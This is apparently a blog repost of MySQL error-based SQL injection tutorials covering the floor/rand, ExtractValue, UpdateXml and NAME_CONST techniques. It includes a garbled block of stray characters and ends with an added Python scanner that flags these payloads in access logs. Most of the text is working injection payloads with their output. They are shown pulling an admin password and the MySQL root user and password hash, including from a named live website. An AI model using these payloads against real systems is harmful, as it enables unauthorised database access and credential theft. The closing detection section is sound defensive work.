
MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted on 2015-11-11 19:03:37

1. Triggering an error with floor

Some payloads that can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement forces the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is leaked in the error message. To read other data, replace the version() expression with the subquery you need. For example, to read the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Collected in addition:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: injecting with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
|---------------|
|     TEST      |
|               |
|---------------|
|       1       |
|               |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

. W- `3 f7 C# ^! ?" g* g# [' X4 R, j6 n+ k% u& ^& w1 r- d
- D) ]) U, V: a, p, @. S" o% E9 B. U
$ f8 s9 H$ B; L9 U+ n
, i  u+ v/ q) w% n" R! y! @9 Q# x8 F
- r, `2 s' N1 |( `( X
And there we have it, thanks for reading.
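A defender-side example, added here and not part of the original thread or either tutorial: a short Python scanner that URL-decodes request paths from web-server access log lines and flags the four error-based signatures collected above (floor(rand(0)*2) with GROUP BY, ExtractValue, UpdateXml, and paired NAME_CONST columns). The host, client IPs and timestamps in LOG_LINES are constructed; the log format is the standard combined format.

```python
import re
from urllib.parse import unquote_plus
# Signatures of the four MySQL error-based techniques collected in this thread,
# matched against the URL-decoded, whitespace-collapsed, lower-cased query string.
ERROR_BASED_SIGNATURES = {
    # floor(rand(0)*2) together with GROUP BY -> "Duplicate entry ... for key 'group_key'"
    "floor_rand_groupby": re.compile(r"(?=.*\bfloor\s*\(\s*rand\s*\()(?=.*\bgroup\s+by\b)"),
    # extractvalue(...) / updatexml(...) -> "XPATH syntax error: '...'"
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    # two NAME_CONST() columns in one subselect -> "Duplicate column name '...'"
    "name_const_dup": re.compile(r"\bname_const\s*\(.*\bname_const\s*\("),
}
# Combined-log prefix: client ip, identd, user, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def normalize(query_string):
    """Decode %xx and '+' twice (the payloads above use both; some scanners double-encode),
    collapse whitespace and lower-case so the signatures match regardless of case."""
    decoded = unquote_plus(unquote_plus(query_string))
    return re.sub(r"\s+", " ", decoded).lower()

def classify_request(request_path):
    """Return the names of the error-based techniques found in one request path."""
    _, _, query_string = request_path.partition("?")
    text = normalize(query_string)
    return [name for name, pat in ERROR_BASED_SIGNATURES.items() if pat.search(text)]

def scan_access_log(lines):
    """Return (client_ip, http_status, techniques) for each request that matches a
    signature; a hit answered with status 500 suggests the DB error reached the client."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format
        ip, path, status = m.groups()
        techniques = classify_request(path)
        if techniques:
            hits.append((ip, int(status), techniques))
    return hits

# Constructed sample lines (hypothetical host, IPs, timestamps); the query strings
# carry the payloads quoted in the thread, once plain, once percent-encoded.
LOG_LINES = [
    '203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /content/detail.php?id=330 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Nov/2015:19:03:41 +0800] "GET /content/detail.php?id=330+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 312',
    '203.0.113.5 - - [11/Nov/2015:19:03:45 +0800] "GET /content/detail.php?id=330+and+extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 298',
    '198.51.100.7 - - [11/Nov/2015:19:04:02 +0800] "GET /content/detail.php?id=330%20and%201%3D(updatexml(1%2Cconcat(0x3a%2C(select%20user()))%2C1)) HTTP/1.1" 500 301',
    '198.51.100.7 - - [11/Nov/2015:19:04:10 +0800] "GET /content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 305',
]
```

Every technique in this thread depends on the database error text being returned to the client; a hit that is answered with HTTP 500, or a response body containing "Duplicate entry", "Duplicate column name" or "XPATH syntax error", confirms that channel is open, and configuring the application to log rather than display database errors closes it.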